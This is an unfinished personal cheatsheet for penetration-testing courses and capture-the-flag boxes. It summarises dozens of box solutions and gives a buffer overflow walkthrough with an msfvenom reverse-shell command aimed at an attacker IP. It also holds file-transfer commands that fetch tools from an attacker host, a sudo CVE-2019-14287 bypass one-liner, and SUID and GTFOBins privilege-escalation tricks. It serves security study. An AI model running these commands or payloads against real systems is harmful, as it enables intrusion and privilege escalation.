Taken from many sources, scavenged from around the web. UNFINISHED cheatsheet for several courses. Covers commands, tools, scripts, definitions etc
Last Updated: July 17, 2021
**make each section separate cheatsheetand remove the catering to OSCP**
Enumeration
Penetration testers are judged by the quality of one's enumeration skills and methods.
Techniques
- creativity, persistence, patience, curiosity
- have strategies ready on how to improvise, adapt and overcome
- never assume
- lateral enumeration (know when to move on or jump back and forth, prevents rabbit holes)
- MOVE ON: brute force 5 min, exploit technique 20 min
- research ability
- understand common/expected processes/services on machines to spot anomalies
- repetition & practice & INTUITION to root\system im talking 120+ boxes
- low hanging fruit (port 21, 80 , 445, "unusual ports like abyss?")
- research all platforms and versions found
- web apps last - look at debugger files first, manipulating cookies and search bars hover over directories
- try the simple stuff first (misconfigurations, default creds (lazy admins), changing passwords, weak permissions)
- (local) if enum scripts/manual searches are empty refer to original attack vector
- develop trusted methodology (no service or technology will be the same, must learn to adapt and use same strategy)
- look for shared folders/drives/repositories/containers between HTTP/SMB/Git and containers
- enumerate first, all avenues of possibilities and things of interest, before exploiation. collect all informaion first
- do not get used to a certain style of box, CTF-y and finding specific puzzles to privesc
- Domain Names (both external and internal)
- Check every single port if it really hosts the service you are thinking
- Don't make any asumptions on services and versions
- Specific IPs reachable by internet and unreachable outside the local network/box/environment (pivoting)
- Access control mechanisms, System architectures,Intrusion detection systems
- local enumeration of the system (user and group names, logs, system banners, routing
tables, SNMP information)
DNS entries
nested credentials
Box Enumeration Results (user/footholds/pivoting before root/admin)
- year of the pig
- usernames via SMB, brute force website, search bar sanitizes input and encodes with base64 shown via HTTP headers, encode shell with base64 and send with repeater through JSON value for initial access
- nmap full scan finds IIS webserver port 49663 with same directory as SMB share, they have common link + SMB is writiable leads to aspx webshell
- ftp server with anonymous login has binary creds file, convert to ASCII and/or unpickle contents of file and format with python leads to initial foothold, lateral movement from ps aux finds user python file to copy and decode with uncompyle6, file has SWX (7321) creds to copy user SSH keys
- nmap reveals JSONP endpoints, a type of XSS attack that doesnt verify requests, with dirsearch finding login.js page indicating login bypass by setting cooking to SessionToken. Spoofing cookie from login.js page reveals SSH key and username, cracked with ssh2john
- enum reveals domain controller running kerberos/ldap, usernames found on webserver & kerbrute validates 3/6. SMB required password brute force with custom wordlist using cewl and smbpasswd to change. SMB lists 2 specific shares associated with printers. MSRPC enumdomusers reveals service printer account and enumprinters reveals account password for evil-winrm.
- dirsearch reveals /content with specific webserver platform name. searchsploit platform reveals method of obtaining creds in .sql file, crack hashed password for login. PHP Code execution in Ads subsection for reverse shell
- dirsearch shows /panel and /uploads for file upload bypass with PHP file. PHP files blocked but similar PHTML files allowed for reverse shell.
- SMB enum finds .exe in unique share, nmap finds webserver on port 31337 accepting unauthorized input, testing with nc confirms, analyzing exe wih immunity debug reveals buffer overflow (offset, bad chars, JMP ESP, msfvenom shellcode) for user shell
- FTP server contains .exe and .dll to be extracted and analyzed for buffer overflow system shell
- dirsearch finds /bin directory with .exe to analyze with immunity debug for user shell
- wpscan for valid admin username, brute force with rockyou and edit website 404.php theme for initial shell, enum shows local port 8080 running with user creds found in /opt for SSH tunnel, docker escape with brute forcing local webserver and shell with javascript console
- subversion port 3690 with website revision repo, repo contains alt domain name and .db file with usernames, svn checkout revision 2 for powershell file with website creds, clone repo in Azure DevOps for aspx shell and commit to new domain for initial shell, lateral movement from winPEAS showing mounted W: drive with svn repos, conf directory contains password (valid username in \Users)
- answer to password reset question in fake employee picture filename, platform found on site with CVE, SMB with creds has .deb of platform, CVE explains to capture user hash with responder by locally running .deb using creds and domain, injecting XSS payload, crack hash for evil-winrm
- nmap full/UDP scan shows SNMP 161, onesixtyone for community string to use with snmp-check shows username, brute force smb with rockyou for password to use with evil-winrm
- enum shows likely domain controller with DNS/LDAP/KER, dig shows unsecured dynamic DNS updates to impersonate server, dirsearch finds .pfx certificate & pfx2john extracts password, openssl extracts contents and impersonates key/cert, nsupdate to add DNS record, responder to capture user hash for web powershell console
- python website icon reveals /account directory that points to /search source code which uses encoded_cookie deserialized with python, initial shell with PoC edited to decode UTF-8 and send GET request with shell cookie, escape docker by SSH tunnel to brute force SSH on host using website usernames
- SQL injection through dev tools cookie value to write hex encoded cmd PHP shell to website directory, download PHP reverse shell wih cmd for initial access, lateral movement to user with forensic analysis log containing plaintext SSH password
- hidden web directory with write permissions, upload PHP shell
- webserver on port 8080, platform & version CVE, public exploit upload nc executable
- union based SQLi to username and hashed password
- webserver port 8080 with default creds, command injection with powershell
- sensitive data (creds) found on SMB samba server, login to webserver to find platform & version CVE for LFI and reverse PHP shell
- FTP platform & version number revealed from searchsploit to download and mount file system for ssh keys
- SMB share w/ AD usernames, lateral movement by pivoting with TGT hashes/unique RPC password permissions, download another share with LSASS dumped hashes to pass the hash with evil-winrm
- port 8080 home webpage displays platform & version CVE for system escalation RCE with PHP reverse shell through command injection
- brute forcing webserver admin account with hydra http-post-form (login page, request body, error message) leads to platform & version for file upload (shell)
- showmount port 2049 NFS reveals website backup folder with mount permissions, contents reveal platform & version CVE that needs creds, creds found via strings in .sdf binary database
- default nmap scripts reveal eternalblue exploit, found public script
- contact page on home webpage reveals platform & version CVE for public script. unstable shell so send cmd with nc
- blog on webpage reveals a poem that alludes to a popular culture character, syntax revealed on other post and password on /robots.txt
- platform found and version found from searching where its located, leads to CVE for SQLi leads to creds
- creds found via hacked social media in pastebin, brute force pop3 with hydra for valid account, find 2 messages with temp password, one account valid
- dirsearch reveals platform & CVE (authenticated), googling leads to default creds, specific platform tool & nullbyte article how to get a shell, can upload any file with curl, PHP reverse shell
- wordpress server, bruteforce with wpscan for user creds, privesc with searchsploit wordpress privesc for profile update with ure_other_roles=admininstrator
- website wih .pcap file, multiple connections from client, knock ports with knock && nmap, knock again for now open port leads to hidden directory, repeats process for hidden message with next port numbers spaced??, repeat process leads to knock && ssh revealing creds, ssh creds /bin/sh
- unique subdirectory with LFI prereqs, new technique requires keyword to read, attempting to read system file appends with .php extension and include() function leads to PHP filter LFI to decode source code which reveals way to read system files and log poisoning to upload shell
- wordpress server wpscan bruteforce for creds, edit obscure PHP extension for PHP reverse shell
- webserver platform & version number reveal CVE SQLi public python script that returns hash with salt
- dirsearch webserver reveal sitemap subdirectory with hidden ssh folder with id_rsa keys, username found in homepage source code
- webserver platform & version leads to CVE reverse shell
techniques like lateral scanning, rabbit holes, knowing when to move on, what to look for (hostnames, IPs, users, hidden directories, default creds, config files, platforms, versions, misconfigurations, system details/anomalies etc)
application specific names (Apache, CMS Simple, CUPPA etc)
cewl custom wordlis
Linux
enum4linx -A <ip>
Windows
Scripting
Python
A script to test which file extensions are allowed to be uploaded to a website (link it)
list relevant things like absuing libraries, pickling/data serialization, link exploit dev
Bash
Web Application Attacks
Website Enumeration
first steps like dev tools, search bar, cookies/JSON values, unexpected behavior, source code, images, filenames, types of requests, loaded objects. OWASP
Here we can transfer the exe to a Windows 10 VM and use Immunity Debugger. Make sure your VM is running on NAT network and port 9999 is open. Run brainpan.exe and attach on Immunity Debugger, click play on Immunity Debugger and begin finding the offset. You can also run a quick nmap scan to verify the port is open, if not open the port via the firewall
We need to fuzz the program to determine at which point will the EIP overflow. We can use pattern_create.rb -l 800 to generate a string and use nc to open a socket and input the string to the listening executable file. Initially I tried 800 characters after doing some manual testing.
nc -v 10.0.2.15 9999
Let's load this in Immunity Debugger, repeat the command, and fetch the overwritten instruction pointer (EIP)
We can see the EIP value of 35724134 which we can input to pattern_offset to obtain the value
pattern_offset.rb -q 35724134
We have an offset of length 524 to use A's or NOP sled with payload = "\x90" * 524 + "JMP ESP" + "\x90" * remainder bytes + shellcode
Identifying Bad Characters
Using the following script to print bad chars and input them using nc 10.0.2.15 9999
#!/usr/bin/env pythonfrom__future__import print_functionfor x inrange(0, 256):print("\\x"+"{:02x}".format(x), end='')print()
Right click on the stack pointer (ESP) and follow the hash dump. We can use mona to list the bad chars by running the commands !mona bytearray followed by !mona compare -a esp -f bytearray.bin
We can see the only bad character is "\x00"
Finding JMP ESP Address
In order to obtain the address we want to JMP to in the stack pointer (ESP), we can use the command !mona jmp -r esp (manually install mona.py to the pycommands folder)
We see our address is 0x311712F3 which in little endian syntax will be \xF3\x12\x17\x31
Generating shellcode to open a reverse shell will be fairly easy, we just need to run the following msfvenom command and input the bad characters we found
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.18.145 LPORT=53 -f c -b "\x00"
Initial Access
The remainder bytes are usually calculated depending on the size of the buffer, doing trial and error the standard number of NOP sleds needed is 20. We now have all of the attributes needed to exploit this buffer overflow and gain a reverse shell. Listening on port 53 and running the program python brainpan.py
In infosec there are often debates about what exactly a vulnerability, an exploit or a software bug is and where one term begins and the other ends.
Bugs
Vulnerabilities
Exploits
Programming errors usually defined and named. Software and hardware
Software bugs which can be taken advantage of to achieve an unintended or unanticipated behavior. There is theoretically a way to exploit it.
Take advantage of a vulnerability and exploit it.
Buffer overflow
Race condition
Access violation
Infinite loop
Division by zero
Off-by-one error
Null pointer dereference
Input validation error
Resource leak
BlueKeep
Shellshock
Dirty COW
Heartbleed
EternalBlue
SQL injection
Code injection
Directory traversal
XSS, CSRF, SSRF
R.C.E
A.C.E
Authentication bypass
Critical info exposed
Denial of Service
Privilege escalation
Feature bypass
User session takeover
Malicious file upload
Man-in-the-middle
Not all public exploits are friendly, as demonstrated below, some of them contain code that will act maliciously towards the attacker. It is vital to inspect all parts of unverified code for possible hidden malice.
GTFObins a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
start here and explain the differences of bug, vulnerability and exploit
ppp
I have to find a method of troubleshooting when exploits are known to work with a certain vulnerability.
File Transfers & Data Exfiltration
don't forget to always chmod 700 tools/programs on Linux
start a python server python3 -m http.server 80, cd /tmp on the victim & wget -R http://<attackerIP>/<locationOfTool> (or simply navigate via browser and download)
curl/http
Netcat
nc -lvnp (port) < fileName: transfer files on Kali to victim
nc <attackerIP> (port) > exploitPath: Get file on victim
- exploited SUID permissions via gtfobins
- LinEnum finds hiden webserver to local port forward in to, platform & version CVE to make custom PoC script
- pspy64 OS enum displays cronjob backup script with tar * wildcard
- SUID files displays non-binary file. searching with strings reveals using commands without full PATH, PATH manipulated for root shell
- sudo permission for yum, shell obtained via GTFObins
- uname -a reveals kernel (3.13/4.14), searchsploit for kernel version reveals public exploit to shell, transfer with nc and compile
- sudo -l cat privileges
- user belogs to group with permissions over python library modules, add code to send shell via socket in popular module like os/sys
- sudo -l for env but stuck in docker env, searching for executable scripts reveals a backup script with full permissions. add nc shell echo command
- SUID nmap binary can start interactive mode and start shell
- SUID vim spawn bash shell
- sudo permission for wget, send flag or /etc/passwd file to attack to add user as root
- website homepage reveal location for root credentials within server
- sudo permissions for python command with specific program, edit program to include python shell
- ssh keys need passphrase for key, ssh2john.py program converts the keys to be cracked with john
- sudo permissions for specific executable that accepts pickled base64 input. call bash shell, pickle and base64 encode it to get root
- cronjob downloads script from overpass.thm and pipes to bash. /etc/hosts is writable so can spoof overpass.thm as attacker and create reverse shell script with same name for root privesc
- sudo -l for specific privilege on perl program. Program calls bash script that we have read/write privileges for. Overwrite bash script with reverse shell for root privesc
- python SUID, gtfobins for root privesc
- sudo privileges with anansi_util found from gtfobins: sudo anansi_util manual man then !/bin/bash
- escape docker container with root creds in /opt directory for SSH
- lateral movement with sudo & read/write privileges for python file, spoof owner & move original file, create new python reverse shell with filename. sudo SETENV privilege with another python file that imports library, add bash shell to file with library name and set tmp path with PYTHONPATH for root shell
- enum shows port running internally, SSH tunnel to access Gitea webserver but 2FA omits creds. Disable 2FA by enum finding .db & use python sqlite3 to delete 2FA table in .db, user creds lead to repo and Git Hooks for reverse shell. escape container by finding shared folder & transfer host bash shell with nc from user SSH session to container shared folder, chmod shell and run on user SSH for root privesc
- sudo permissions w/o secure path for shutdown, strings with binary shows it calls poweroff, spoof bash shell with poweroff and set permanent PATH for root
- year of the pig
There exists a vulnerability in sudo versions < 1.8.28, CVE-2019-14287. Any user can run sudo as root using the below command, only works if you've been granted non-root sudo permissions for the command.
sudo -u#-1 <commandOrBin>
Kernel/system information
uname -a
ls -la /etc | grep release
/etc/issue
/etc/*-release
/etc/lsb-release # Debian based
/etc/redhat-release # Redhat based
/proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
Root processes
ps aux | grep root
SUID files
find / -perm /4000 -type f -exec ls -lda {} \; 2>/dev/null
- SeImpersonatePrivilege permits PrintSpoofer.exe, system/DC escalation with mayor precompiled exe using reverse shell .exe
- SeLoadDriverPrivilege enabled, whoami /priv doc reveals necessities of Print Operators group which checks out, found git repo with .sys, .bat and two .exe files. made new reverse shell .exe and transferred via SMB for system privesc
- Firefox.lnk file (reference to original) on Desktop points to hidden location with .db, .sqlite and .json files to extract admin password with firefox_decrypt for psexec pass hash system shell
- using original Azure DevOps devops.worker.htb with new creds to make new starter pipeline, adding a line to include the user as an admin
- unique directory in c:\ with powershell script using Invoke-Expression cmdlet (arbitrary command execution) on hosts file, lateral movement to file owner with Account Operator group privilege to change password. add new user, smb with lateral creds to get hosts file and append command with new user as admin, remove old file, re-upload and evil-winrm with new user
- checking "C:\$Recycle.bin\userSID" contains system.bak and sam.bak files, make c:\temp to transfer and download with evil-winrm, crack with secretsdump.py
- powershell to download winPEAS, finds Unquoted Service path, replace with reverse shell executable (msfvenom)
- script file on home AD system with unique syntax leads to DiskShadow NTDS.dit extraction (had to find custom DS script) on cloned snapshot to pass admin hash
- winPEAS reveals multiple instances of windows scheduler running, checking the log of systemscheduler reveals executable called by admin with full permissions, shell with msfvenom and download via smbserver to same PATH
- PowerUp script reveals service permissions vulnerability with invoke-serviceabuse, allows us to run any command with system privileges, download msfvenom shell with certutil
- executable file in downloads folder reveals CVE public exploit. exploit uses python on system, OS doesn't have python installed so local port forwarding with plink.exe is necessary. B.O so manually send cmd with nc with msfvenom in hex
- user can access GUI control panel & change permissions and view hidden files. Hidden folder reveals admin password
- executable file on desktop leads to CVE buffer overflow
go back over windows CTFs for whoami /priv practice
CMD/Powershell commands
cls: clears the screen
dir: equivalent to ls
dir <filename> /s: lists the path of the file
type: equivalent to cat
net user: lists all users on system
net user <user>: lists permissions & info about <user>
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"